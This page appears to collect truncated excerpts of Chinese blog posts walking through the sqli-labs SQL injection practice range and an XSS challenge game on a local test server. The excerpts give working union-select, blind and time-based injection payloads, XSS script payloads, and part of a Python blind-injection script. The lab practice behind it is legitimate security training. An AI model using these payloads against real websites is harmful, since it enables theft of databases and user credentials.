第十一关 从第十一关开始,就开始用post来提交数据了,我们每关的目的都是获取users表下password字段的内容. post是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常常使用的用户登录模块.网站的留言板模块等,在这些功能模块中我们提交的数据都是以 我们可以用抓包软件来修改post提交的数据. 首先测试一下是字符型还是数字型,再输入的用户名和密码之间输入一个'查看是否报错 可以看到,有报错,说明是字符型注入,由于我们不知道密码,但是因为这里有sql注入我们可以用个万…

1.联合查询注入:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,user(),3 --+http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3 --+http://127.0.0.1/sqli/Less-1/…

0x1普通测试方式 (1)输入and1=1和and1=2测试,返回错误,证明存在注入 (2)union select联合查询 (3)查询表名 (4)其他 payload: ,( ,( 0x2 堆叠注入方式 payload: http:;, 0x3 第四十二关 本关打开是post,新建用户和重置密码处都无法访问Update更新数据后,经过mysql_real_escape_string()处理后的数据,存入到数据库当中后不会发生变化.在select调用的时候才能发挥作用.所以不用考虑在更新密码处进…

在开始接触渗透测试开始,最初玩的最多的就是Sql注入,注入神器阿D.明小子.穿山甲等一切工具风靡至今.当初都是以日站为乐趣,从安全法实施后在没有任何授权的情况下,要想练手只能本地环境进行练手,对于sql注入的练习场网上有大把的靶场,我个人比较喜欢sqli-labs这个靶场,关卡有几十个,每一关都有不同的感觉.写这篇文章是个人再练习注入的时候自己总结出来的一部分经验,百度上面也能搜的到相关类似的过关技巧,至于为什么要写这个,这相当于对自己经验的一个总结吧!关于搭建请自行github进行查看,这里我…

先看了一遍关于sql的一些知识点,通关sqli-labs加深下印象.之前也因为作业的原因通关过前10关,但那时候不懂得原理,跟着网上的教程做的,所以这次尝试自己思考通关. less1 尝试and1=2,不为数值注入 加单引号报错,判断为单引号字符注入 判断表有几行数据,order by 4–+时报错 用union联合查询有无显示位 查询数据库名 ?id=0' union select 1,(select group_concat(schema_name) from information_sch…

第一关: 没有过滤,直接构造payload过关: http://127.0.0.1/xssgame/level1.php?name=test%3Cscript%3Ealert%28111%29%3C/script%3E 第二关: 输入之后观察页面源代码可以看到<>被转义 Payload:?keyword=test"><script>alert(111)</script> 第三关: 输入之后查看源代码发现输出位置都被转义: 然后通过'和//闭合,用' on…

开始挑战第九关(Blind- Time based- Single Quotes- String)和第十关( Blind- Time based- Double Quotes- String) gogogo! 这一关为时间盲注,需要用到的函数如下: 正常的测试语句视乎没有任何效果 那就直接用到函数来测试吧 使用firebug来查看网络延迟 通过上面的测试,确实存在时间盲注,那我们就利用盲注的sql语句加时间盲注继续进行注入,通过if条件真假返回的判断 这句话意思就是 如果条件成立,就停止5秒,否…

废话不在多说  let's go!   继续挑战第二关(Error Based- Intiger) 同样的前奏,就不截图了 ,and 1=1和and 1=2进行测试,出现报错 还原sql语句 查看源代码也是如此 使用 order  by 猜解字段数了,同样的正确是3个字段数 union select  联合查询 同样的查询数据库,版本信息,当前用户 爆出所有表名,和第一关相同 爆列名 爆数据…

import requests import os #此函数先判断数据库长度 def length(url,str): num = 1 while True: str_num = '%d' %num len_url = url + "' and (select length(database()) = " + str_num +")--+" response = requests.get(len_url) if str in response.text: print…

less2 and 1=1有回显,and 1=2无回显,为数值型注入 order by 4–+报错,有3行 查询数据库名 ?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询列名 ?id=0 union select 1,(select group_concat(schema_name) from information_schema.schemata)…